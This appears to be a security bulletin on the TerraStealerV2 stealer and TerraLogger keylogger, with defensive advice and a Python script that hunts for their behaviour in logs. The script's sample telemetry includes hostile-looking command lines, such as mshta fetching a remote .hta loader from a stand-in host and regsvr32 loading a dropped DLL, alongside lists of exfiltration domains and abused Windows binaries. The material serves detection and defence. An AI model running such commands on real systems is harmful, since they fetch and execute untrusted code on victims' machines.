TerraStealerV2 and TerraLogger: Golden Chickens' New Malware Families Discovered

Summary:
Researchers at Recorded Future found two new types of malware made by a cybercriminal group called Golden Chickens. These hackers are known for selling malware to other criminals online. The new malware tools are called TerraStealerV2 and TerraLogger, and they were active between January and April 2025.

TerraStealerV2 is built to steal usernames, passwords, cryptocurrency wallet data, and browser data, mostly from Google Chrome. It reaches victims as files disguised as something harmless: Windows shortcuts (LNK), installers (MSI), or ordinary programs (EXE and DLL files). Once running, it launches through trusted Windows binaries such as regsvr32.exe or mshta.exe so that antivirus software is less likely to flag it. It then sends the stolen data to the attackers through Telegram or through a suspicious site, wetransfers[.]io. One limitation worth noting: it cannot decrypt credentials from newer Chrome versions that use App-Bound Encryption (ABE), which suggests the malware is either slightly outdated or still under development.

TerraLogger is a much simpler tool—it’s just a keylogger. That means it records everything someone types on their keyboard. It doesn’t send the info anywhere; it just saves it to a file on the infected computer. This tool also seems to still be in development, with small updates showing that the hackers are still testing how it works.

Golden Chickens has been around for years and is behind other malware that’s been used in attacks on big companies like British Airways and Ticketmaster. These new tools show they’re still very active and still trying to steal information and make money by selling access to other hackers.

If your organization hasn't already, it's a good idea to block sites like wetransfers[.]io, watch for unexpected shortcut or installer files, and check for suspicious processes launching regsvr32.exe or contacting Telegram. These are signs that something shady might be going on.

In short:

  • TerraStealerV2 steals browser info and crypto data, but struggles with newer Chrome protections.
  • TerraLogger tracks what people type and saves it, but doesn’t send it anywhere (yet).
  • Both tools are still being updated and could get more dangerous.
  • They’re being used by a group known for selling tools to other hackers.

Security Officer Comments:
What's especially chilling is that this malware doesn't just siphon login information or track what you're typing—it disguises itself by using tools computers already trust, so it's hard for security software to catch. Worse, the gang behind it, Golden Chickens, sells these tools to other criminals, so it's not some single hacker who's using it—it could be hundreds. The fact that they’re still testing and improving it means we’ll probably see stronger versions soon. That’s why it’s so important to keep systems updated, be careful with strange files or links, and watch for anything that seems off.

Suggested Corrections:
To protect yourself and your computer from scary malware like TerraStealerV2 and TerraLogger, here are a few important things you should do:

  • Keep your software updated — especially browsers like Chrome. The newer versions have extra protections that this malware can’t break (yet).
  • Don’t open random files — especially shortcuts (.lnk), installers (.msi), or anything that seems off, even if it looks harmless.
  • Use antivirus software and keep it updated. It’s not perfect, but it can help catch the obvious threats.
  • Block unknown websites like wetransfers[.]io (where this malware sends stolen data).
  • Watch for strange behavior, like unexpected files showing up in places such as C:\ProgramData\ or programs running that you didn't start (for example regsvr32.exe or mshta.exe, which are legitimate Windows tools this malware abuses).
  • Use strong, unique passwords and a password manager — just in case anything ever does get stolen.

Basically: stay alert, update everything, and don’t click random stuff. Hackers are getting smarter, but so can we.
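The summary and the list above boil down to two things a defender can actually hunt for: regsvr32.exe or mshta.exe being launched with a payload from a user-writable folder (such as C:\ProgramData\) or from a URL, and a non-browser process talking to wetransfers[.]io or the Telegram API. The following Python script is an added example written for this page, not code from Recorded Future or from the Golden Chickens report. It runs simple detection logic over a handful of constructed, Sysmon-style process-creation and network-connection events; the pipe-separated key=value layout, the host names, the file names and the example.invalid URL are all made up for the demonstration, and the allowlist of processes expected to contact Telegram is an assumption you would tune for your own environment.

```python
"""Hunt for the TerraStealerV2-style behaviour described in the summary:
LOLBin launches (regsvr32.exe / mshta.exe) with a suspicious payload, and
outbound connections to the exfiltration domains. The log format below is
an assumption made for this example; real telemetry (Sysmon Event ID 1 and
Event ID 3, or your EDR's equivalent) carries the same fields under other names."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Indicators taken directly from the summary above.
EXFIL_DOMAINS = {"wetransfers.io", "api.telegram.org"}
LOLBINS = {"regsvr32.exe", "mshta.exe"}

# A signed Windows binary loading its payload from one of these locations, or
# from a URL, is the signal; DLL registration from Program Files by an installer is not.
SUSPICIOUS_PATHS = re.compile(
    r"(c:\\programdata\\|\\appdata\\local\\temp\\|\\downloads\\|\\users\\public\\)", re.I
)
REMOTE_CONTENT = re.compile(r"https?://", re.I)

# Processes we expect to reach api.telegram.org legitimately (assumption; tune per environment).
NETWORK_ALLOWLIST = {"chrome.exe", "msedge.exe", "firefox.exe", "telegram.exe"}


@dataclass
class Alert:
    rule: str
    host: str
    detail: str


def parse_event(line: str) -> Dict[str, str]:
    """Parse 'key=value' fields separated by ' | '; values may contain spaces and backslashes."""
    event: Dict[str, str] = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        event[key.strip()] = value.strip()
    return event


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: Dict[str, str]) -> Optional[Alert]:
    """Flag regsvr32.exe / mshta.exe when the command line points at a user-writable path or a URL."""
    image = basename(ev.get("Image", ""))
    if image not in LOLBINS:
        return None
    cmd = ev.get("CommandLine", "")
    reasons = []
    if SUSPICIOUS_PATHS.search(cmd):
        reasons.append("payload in user-writable path")
    if REMOTE_CONTENT.search(cmd):
        reasons.append("remote content in command line")
    if not reasons:
        return None  # ordinary use of the tool, e.g. an installer registering its own DLL
    parent = basename(ev.get("ParentImage", "")) or "unknown"
    detail = f"{image} launched by {parent}: {cmd} ({'; '.join(reasons)})"
    return Alert("lolbin_suspicious_payload", ev.get("Host", "?"), detail)


def check_network(ev: Dict[str, str]) -> Optional[Alert]:
    """Flag any non-allowlisted process connecting to one of the exfiltration domains."""
    dest = ev.get("DestinationHostname", "").lower()
    image = basename(ev.get("Image", ""))
    if dest not in EXFIL_DOMAINS or image in NETWORK_ALLOWLIST:
        return None
    detail = f"{ev.get('Image', '?')} -> {dest}:{ev.get('DestinationPort', '?')}"
    return Alert("exfil_domain_contact", ev.get("Host", "?"), detail)


def hunt(lines: Iterable[str]) -> List[Alert]:
    """Run both checks over raw log lines and collect the alerts."""
    alerts: List[Alert] = []
    for line in lines:
        ev = parse_event(line)
        kind = ev.get("EventType")
        alert = None
        if kind == "ProcessCreate":
            alert = check_process(ev)
        elif kind == "NetworkConnect":
            alert = check_network(ev)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample telemetry: two malicious LOLBin launches, one benign installer
# action, one stealer exfil attempt, and one benign browser connection.
SAMPLE_EVENTS = [
    "EventType=ProcessCreate | Host=WS01 | Image=C:\\Windows\\System32\\regsvr32.exe"
    " | CommandLine=regsvr32.exe /s C:\\ProgramData\\update.dll | ParentImage=C:\\Windows\\explorer.exe",
    "EventType=ProcessCreate | Host=WS01 | Image=C:\\Windows\\System32\\mshta.exe"
    " | CommandLine=mshta.exe http://example.invalid/loader.hta | ParentImage=C:\\Windows\\System32\\cmd.exe",
    "EventType=ProcessCreate | Host=WS02 | Image=C:\\Windows\\System32\\regsvr32.exe"
    " | CommandLine=regsvr32.exe /s \"C:\\Program Files\\Vendor\\ctl.dll\" | ParentImage=C:\\Windows\\System32\\msiexec.exe",
    "EventType=NetworkConnect | Host=WS01 | Image=C:\\ProgramData\\svc.exe"
    " | DestinationHostname=wetransfers.io | DestinationPort=443",
    "EventType=NetworkConnect | Host=WS03 | Image=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
    " | DestinationHostname=api.telegram.org | DestinationPort=443",
]

if __name__ == "__main__":
    for a in hunt(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.host}: {a.detail}")
```

Run against the constructed sample it produces three alerts: both LOLBin launches on WS01 and the connection from the dropped svc.exe to wetransfers[.]io, while the installer's DLL registration and Chrome reaching the Telegram API stay quiet. The path and URL test is what keeps the rule usable; alerting on every regsvr32.exe start would drown the real signal in installer noise.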

Link(s):
https://www.recordedfuture.com/research/terrastealerv2-and-terralogger